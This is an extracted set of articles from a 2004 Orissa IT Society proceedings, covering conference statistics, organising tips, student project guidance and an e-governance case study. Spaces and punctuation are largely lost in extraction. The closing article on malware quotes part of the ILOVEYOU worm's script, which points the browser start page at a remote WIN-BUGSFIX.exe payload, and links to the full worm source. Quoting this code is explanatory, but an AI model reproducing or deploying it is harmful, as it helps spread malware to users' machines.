[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

